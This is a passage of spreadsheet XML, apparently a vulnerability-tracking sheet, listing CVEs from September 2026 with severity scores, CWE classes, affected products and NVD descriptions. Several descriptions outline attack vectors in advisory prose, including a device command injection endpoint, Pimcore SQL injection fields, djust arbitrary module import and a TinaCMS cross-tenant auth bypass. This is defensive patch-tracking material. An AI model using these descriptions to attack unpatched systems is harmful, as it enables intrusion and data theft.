          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/attached_devices_tab/ajax_remove_uploaded_iodd_files endpoint using operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27558</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27559</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr"/>
      <c r="Q159" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /api/status/data endpoint by sending a crafted GET request with user credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27559</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43686</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr"/>
      <c r="Q160" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Connecting to a malicious NFS server may lead to kernel memory corruption.</t>
        </is>
      </c>
      <c r="S160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43686</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43815</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr"/>
      <c r="Q161" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Sequoia 15.7.8, macOS Sonoma 14.8.8, macOS Tahoe 26.6. Connecting to a malicious afpfs server may lead to kernel memory corruption.</t>
        </is>
      </c>
      <c r="S161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43815</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47094</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr"/>
      <c r="Q162" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>SIMAC MyPHR 1.1 contains an insecure direct object reference (IDOR) vulnerability that allows authenticated attackers to access and modify arbitrary employee records due to missing server-side ownership validation. Attackers can send a PUT request to the employee update endpoint with an arbitrary employee identifier and a controlled password value to take over target accounts, enumerate employee records, and retrieve sensitive personally identifiable information including private pay bulletins.</t>
        </is>
      </c>
      <c r="S162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47094</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55416</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr"/>
      <c r="Q163" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, an authenticated user with reports_config permission can place attacker-controlled SQL fragments in the sql, from, where, and groupby fields of a Custom Reports configuration processed by bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php. The buildQueryString() method concatenates these values into a database query, while a blacklist omits dangerous constructs such as additional data-manipulation statements, comments, subqueries, and multiple statements. The getData() method also previously interpolated offset and limit values into a LIMIT clause without integer casting. Executing the configured report reaches fetchAllAssociative() with the constructed query and can disclose, modify, or delete arbitrary database data. This issue is fixed in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="S163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55416</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61599</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M164" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr"/>
      <c r="Q164" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the djust live transport resolves the LiveView to mount from a client-supplied dotted path by calling `__import__(module_path, ...)`. The module is imported — running its top-level code (import side effects) — before the framework checks that the resolved object is a `LiveView` subclass and before any per-view authentication. The `LIVEVIEW_ALLOWED_MODULES` allowlist that should contain this is fail-open (`if allowed_modules:` — skipped when the setting is unset, the framework default) and uses loose `startswith` matching. An unauthenticated WebSocket client (the WS handshake does not require auth; per-view auth runs only after import + instantiate) can therefore send a `mount` / `live_redirect_mount` / `url_change` frame (or an SSE mount) with `view = "&lt;any.importable.module&gt;.AnyName"` and cause the server to import — and execute the top-level code of — any importable Python module by name. Version 1.0.7 fixes the issue with a fail-closed resolution gate (`djust._view_resolution.is_view_import_allowed`): a client view path resolves only if (a) its module is already loaded (`sys.modules` — so resolving runs no new code; URL-routed views loaded by URLconf at startup keep working with zero config) or (b) it matches `LIVEVIEW_ALLOWED_MODULES` on a module-segment boundary (explicit opt-in for lazily-imported views). The gate runs before `__import__` at all three sinks (+ defense-in-depth inside `_instantiate_view`). As a workaround, set `LIVEVIEW_ALLOWED_MODULES` to the narrow list of modules that contain your mountable LiveView classes. (Note: pre-patch the allowlist is `startswith`-matched and the import still precedes the subclass check, so this is mitigation, not a complete fix.)</t>
        </is>
      </c>
      <c r="S164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61599</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K165"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65" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr"/>
      <c r="Q165" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63506</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr"/>
      <c r="Q166" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>Tina is a headless content management system. Prior to @tinacms/auth 1.1.4 and next-tinacms-azure 15.0.1, isAuthorized accepts a request-controlled clientID and asks isUserAuthorized to validate the bearer token against that selected TinaCloud app instead of the self-hosted site's configured app. An attacker with any TinaCloud account can submit the attacker's own app ID and valid token to a victim endpoint, causing TinaCloudBackendAuthProvider or an affected media authorized callback to accept the attacker's verified status across the tenant boundary. The vulnerable logic is present in packages/@tinacms/auth/src/index.ts and packages/next-tinacms-azure/src/auth.ts. Successful exploitation permits media listing, reading, upload, or deletion and, when TinaCloudBackendAuthProvider is used, GraphQL read, create, update, and delete operations on the victim's content without a victim account or victim interaction. This vulnerability is fixed in @tinacms/auth 1.1.4 and next-tinacms-azure 15.0.1.</t>
        </is>
      </c>
      <c r="S166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63506</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65374</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr"/>
      <c r="Q167" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious WebDAV server may result in code execution.</t>
        </is>
      </c>
      <c r="S167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65374</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65390</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:safari, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr"/>
      <c r="Q168" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in Safari 26.6.1, iOS 26.6.1 and iPadOS 26.6.1, macOS Tahoe 26.6.2, tvOS 27, visionOS 27, watchOS 27. Processing maliciously crafted web content may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65390</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65391</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:safari, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr"/>
      <c r="Q169" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in Safari 26.6.1, iOS 26.6.1 and iPadOS 26.6.1, macOS Tahoe 26.6.2, tvOS 27, visionOS 27, watchOS 27. Processing maliciously crafted web content may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65391</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr"/>
      <c r="Q170" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr"/>
      <c r="Q171" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr"/>
      <c r="Q172" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr"/>
      <c r="Q173" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
